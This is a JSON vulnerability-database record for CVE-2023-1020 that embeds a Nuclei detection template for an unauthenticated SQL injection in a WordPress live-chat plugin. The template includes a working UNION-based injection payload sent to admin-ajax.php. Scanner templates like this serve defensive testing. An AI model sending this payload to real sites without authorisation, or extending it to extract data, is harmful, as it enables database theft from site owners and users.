{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-1020/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-1020/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-1020/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-1020/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-1020/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-1020"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-1020"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-1020.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-1020\n\ninfo:\n  name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n  impact: |\n    Unauthenticated attackers can execute SQL injection through AJAX actions to extract the complete WordPress database including chat logs and user credentials.\n  remediation: |\n    Update to the latest version of the Steveas WP Live Chat Shoutbox plugin (1.4.2) or apply the vendor-provided patch to fix the SQL Injection vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff\n    - https://wordpress.org/plugins/wp-shoutbox-live-chat/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-1020\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-1020\n    cwe-id: CWE-89\n    epss-score: 0.0499\n    epss-percentile: 0.91899\n    cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: wp_live_chat_shoutbox_project\n    product: wp_live_chat_shoutbox\n    framework: wordpress\n  tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n        action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"c8c605999f3d8352d7bb792cf3fdb25b\"\n          - \"no_participation\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402206f6faeeb041c423388a108ec45c14b552e7191ee15883e4e9e12c18a7e09d3de022066fca09e17b618cdcb3dcfefca583b789de32200284099944129e947ed578e0c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-1020"
}